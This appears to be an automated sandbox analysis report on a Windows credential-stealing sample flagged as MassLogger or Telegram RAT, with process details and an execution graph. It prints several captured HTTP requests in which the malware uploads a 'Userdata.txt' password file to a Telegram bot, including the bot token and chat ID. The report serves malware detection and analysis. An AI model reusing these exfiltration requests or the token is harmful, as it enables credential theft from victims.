                                                                                                          2025-01-11 06:32:20 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 62 39 33 32 37 66 32 66 30 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd32b9327f2f0cContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 06:32:21 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 06:32:21 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 536
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 06:32:21 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 38 39 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 37 31 34 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44894,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736577141,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          12192.168.2.450026149.154.167.2204433052C:\Users\user\Desktop\ZaRP7yvL1J.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 06:32:23 UTC295OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd32dc5952d48d
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-11 06:32:23 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 64 63 35 39 35 32 64 34 38 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd32dc5952d48dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 06:32:24 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 06:32:24 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 535
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 06:32:24 UTC535INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 38 39 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 37 31 34 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44895,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736577144,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          13192.168.2.450028149.154.167.2204433052C:\Users\user\Desktop\ZaRP7yvL1J.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 06:32:26 UTC295OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd32ff5404f1e0
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-11 06:32:26 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 66 66 35 34 30 34 66 31 65 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd32ff5404f1e0Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 06:32:27 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 06:32:26 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 535
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 06:32:27 UTC535INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 38 39 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 37 31 34 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44896,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736577146,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          14192.168.2.450030149.154.167.2204433052C:\Users\user\Desktop\ZaRP7yvL1J.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 06:32:28 UTC295OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd3318c7ad4f72
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-11 06:32:28 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 31 38 63 37 61 64 34 66 37 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd3318c7ad4f72Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 06:32:29 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 06:32:29 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 535
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 06:32:29 UTC535INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 38 39 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 37 31 34 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44897,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736577149,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          15192.168.2.450032149.154.167.2204433052C:\Users\user\Desktop\ZaRP7yvL1J.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 06:32:33 UTC295OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd333777302c9a
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-11 06:32:33 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 33 37 37 37 33 30 32 63 39 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd333777302c9aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 06:32:33 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 06:32:33 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 535
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 06:32:33 UTC535INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 38 39 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 37 31 35 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44898,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736577153,"document":{"file_name":"U


                                                                                                          Click to jump to process

                                                                                                          Click to jump to process

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Click to jump to process

                                                                                                          Target ID:0
                                                                                                          Start time:01:30:25
                                                                                                          Start date:11/01/2025
                                                                                                          Path:C:\Users\user\Desktop\ZaRP7yvL1J.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\ZaRP7yvL1J.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:1'011'570 bytes
                                                                                                          MD5 hash:DF41E72F1C096D443CEFD72755DF031F
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:4
                                                                                                          Start time:01:31:33
                                                                                                          Start date:11/01/2025
                                                                                                          Path:C:\Users\user\Desktop\ZaRP7yvL1J.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\ZaRP7yvL1J.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:1'011'570 bytes
                                                                                                          MD5 hash:DF41E72F1C096D443CEFD72755DF031F
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000004.00000002.2950226933.0000000035E4A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2950226933.0000000035E4A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.2950226933.0000000035E4A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:false

                                                                                                          Reset < >

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:19.7%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:19.6%
                                                                                                            Total number of Nodes:1592
                                                                                                            Total number of Limit Nodes:38
                                                                                                            execution_graph 4163 401941 4164 401943 4163->4164 4169 402c41 4164->4169 4170 402c4d 4169->4170 4215 40640a 4170->4215 4173 401948 4175 405afa 4173->4175 4257 405dc5 4175->4257 4178 405b22 DeleteFileW 4180 401951 4178->4180 4179 405b39 4181 405c64 4179->4181 4271 4063e8 lstrcpynW 4179->4271 4181->4180 4300 40672b FindFirstFileW 4181->4300 4183 405b5f 4184 405b72 4183->4184 4185 405b65 lstrcatW 4183->4185 4272 405d09 lstrlenW 4184->4272 4188 405b78 4185->4188 4189 405b88 lstrcatW 4188->4189 4190 405b7e 4188->4190 4192 405b93 lstrlenW FindFirstFileW 4189->4192 4190->4189 4190->4192 4194 405c59 4192->4194 4213 405bb5 4192->4213 4193 405c82 4303 405cbd lstrlenW CharPrevW 4193->4303 4194->4181 4197 405c3c FindNextFileW 4201 405c52 FindClose 4197->4201 4197->4213 4198 405ab2 5 API calls 4200 405c94 4198->4200 4202 405c98 4200->4202 4203 405cae 4200->4203 4201->4194 4202->4180 4206 405450 24 API calls 4202->4206 4205 405450 24 API calls 4203->4205 4205->4180 4208 405ca5 4206->4208 4207 405afa 60 API calls 4207->4213 4210 4061ae 36 API calls 4208->4210 4209 405450 24 API calls 4209->4197 4211 405cac 4210->4211 4211->4180 4213->4197 4213->4207 4213->4209 4276 4063e8 lstrcpynW 4213->4276 4277 405ab2 4213->4277 4285 405450 4213->4285 4296 4061ae MoveFileExW 4213->4296 4228 406417 4215->4228 4216 406662 4217 402c6e 4216->4217 4248 4063e8 lstrcpynW 4216->4248 4217->4173 4232 40667c 4217->4232 4219 406630 lstrlenW 4219->4228 4220 40640a 10 API calls 4220->4219 4223 406545 GetSystemDirectoryW 4223->4228 4225 406558 GetWindowsDirectoryW 4225->4228 4226 40667c 5 API calls 4226->4228 4227 4065d3 lstrcatW 4227->4228 4228->4216 4228->4219 4228->4220 4228->4223 4228->4225 4228->4226 4228->4227 4229 40658c SHGetSpecialFolderLocation 4228->4229 4230 40640a 10 API calls 4228->4230 4241 4062b6 4228->4241 4246 40632f wsprintfW 4228->4246 4247 4063e8 lstrcpynW 4228->4247 4229->4228 4231 4065a4 SHGetPathFromIDListW CoTaskMemFree 4229->4231 4230->4228 4231->4228 4239 406689 4232->4239 4233 4066ff 4234 406704 CharPrevW 4233->4234 4236 406725 4233->4236 4234->4233 4235 4066f2 CharNextW 4235->4233 4235->4239 4236->4173 4238 4066de CharNextW 4238->4239 4239->4233 4239->4235 4239->4238 4240 4066ed CharNextW 4239->4240 4253 405cea 4239->4253 4240->4235 4249 406255 4241->4249 4244 40631a 4244->4228 4245 4062ea RegQueryValueExW RegCloseKey 4245->4244 4246->4228 4247->4228 4248->4217 4250 406264 4249->4250 4251 406268 4250->4251 4252 40626d RegOpenKeyExW 4250->4252 4251->4244 4251->4245 4252->4251 4254 405cf0 4253->4254 4255 405d06 4254->4255 4256 405cf7 CharNextW 4254->4256 4255->4239 4256->4254 4306 4063e8 lstrcpynW 4257->4306 4259 405dd6 4307 405d68 CharNextW CharNextW 4259->4307 4262 405b1a 4262->4178 4262->4179 4263 40667c 5 API calls 4269 405dec 4263->4269 4264 405e1d lstrlenW 4265 405e28 4264->4265 4264->4269 4267 405cbd 3 API calls 4265->4267 4266 40672b 2 API calls 4266->4269 4268 405e2d GetFileAttributesW 4267->4268 4268->4262 4269->4262 4269->4264 4269->4266 4270 405d09 2 API calls 4269->4270 4270->4264 4271->4183 4273 405d17 4272->4273 4274 405d29 4273->4274 4275 405d1d CharPrevW 4273->4275 4274->4188 4275->4273 4275->4274 4276->4213 4313 405eb9 GetFileAttributesW 4277->4313 4280 405adf 4280->4213 4281 405ad5 DeleteFileW 4283 405adb 4281->4283 4282 405acd RemoveDirectoryW 4282->4283 4283->4280 4284 405aeb SetFileAttributesW 4283->4284 4284->4280 4286 40546b 4285->4286 4287 40550d 4285->4287 4288 405487 lstrlenW 4286->4288 4289 40640a 17 API calls 4286->4289 4287->4213 4290 4054b0 4288->4290 4291 405495 lstrlenW 4288->4291 4289->4288 4293 4054c3 4290->4293 4294 4054b6 SetWindowTextW 4290->4294 4291->4287 4292 4054a7 lstrcatW 4291->4292 4292->4290 4293->4287 4295 4054c9 SendMessageW SendMessageW SendMessageW 4293->4295 4294->4293 4295->4287 4297 4061cf 4296->4297 4298 4061c2 4296->4298 4297->4213 4316 406034 4298->4316 4301 406741 FindClose 4300->4301 4302 405c7e 4300->4302 4301->4302 4302->4180 4302->4193 4304 405c88 4303->4304 4305 405cd9 lstrcatW 4303->4305 4304->4198 4305->4304 4306->4259 4308 405d85 4307->4308 4310 405d97 4307->4310 4309 405d92 CharNextW 4308->4309 4308->4310 4312 405dbb 4309->4312 4311 405cea CharNextW 4310->4311 4310->4312 4311->4310 4312->4262 4312->4263 4314 405abe 4313->4314 4315 405ecb SetFileAttributesW 4313->4315 4314->4280 4314->4281 4314->4282 4315->4314 4317 406064 4316->4317 4318 40608a GetShortPathNameW 4316->4318 4343 405ede GetFileAttributesW CreateFileW 4317->4343 4320 4061a9 4318->4320 4321 40609f 4318->4321 4320->4297 4321->4320 4323 4060a7 wsprintfA 4321->4323 4322 40606e CloseHandle GetShortPathNameW 4322->4320 4325 406082 4322->4325 4324 40640a 17 API calls 4323->4324 4326 4060cf 4324->4326 4325->4318 4325->4320 4344 405ede GetFileAttributesW CreateFileW 4326->4344 4328 4060dc 4328->4320 4329 4060eb GetFileSize GlobalAlloc 4328->4329 4330 4061a2 CloseHandle 4329->4330 4331 40610d 4329->4331 4330->4320 4345 405f61 ReadFile 4331->4345 4336 406140 4338 405e43 4 API calls 4336->4338 4337 40612c lstrcpyA 4339 40614e 4337->4339 4338->4339 4340 406185 SetFilePointer 4339->4340 4352 405f90 WriteFile 4340->4352 4343->4322 4344->4328 4346 405f7f 4345->4346 4346->4330 4347 405e43 lstrlenA 4346->4347 4348 405e84 lstrlenA 4347->4348 4349 405e8c 4348->4349 4350 405e5d lstrcmpiA 4348->4350 4349->4336 4349->4337 4350->4349 4351 405e7b CharNextA 4350->4351 4351->4348 4353 405fae GlobalFree 4352->4353 4353->4330 4354 4015c1 4355 402c41 17 API calls 4354->4355 4356 4015c8 4355->4356 4357 405d68 4 API calls 4356->4357 4362 4015d1 4357->4362 4358 401631 4360 401663 4358->4360 4361 401636 4358->4361 4359 405cea CharNextW 4359->4362 4365 401423 24 API calls 4360->4365 4381 401423 4361->4381 4362->4358 4362->4359 4371 401617 GetFileAttributesW 4362->4371 4373 4059b9 4362->4373 4376 40591f CreateDirectoryW 4362->4376 4385 40599c CreateDirectoryW 4362->4385 4368 40165b 4365->4368 4370 40164a SetCurrentDirectoryW 4370->4368 4371->4362 4388 4067c2 GetModuleHandleA 4373->4388 4377 405970 GetLastError 4376->4377 4378 40596c 4376->4378 4377->4378 4379 40597f SetFileSecurityW 4377->4379 4378->4362 4379->4378 4380 405995 GetLastError 4379->4380 4380->4378 4382 405450 24 API calls 4381->4382 4383 401431 4382->4383 4384 4063e8 lstrcpynW 4383->4384 4384->4370 4386 4059b0 GetLastError 4385->4386 4387 4059ac 4385->4387 4386->4387 4387->4362 4389 4067e8 GetProcAddress 4388->4389 4390 4067de 4388->4390 4392 4059c0 4389->4392 4394 406752 GetSystemDirectoryW 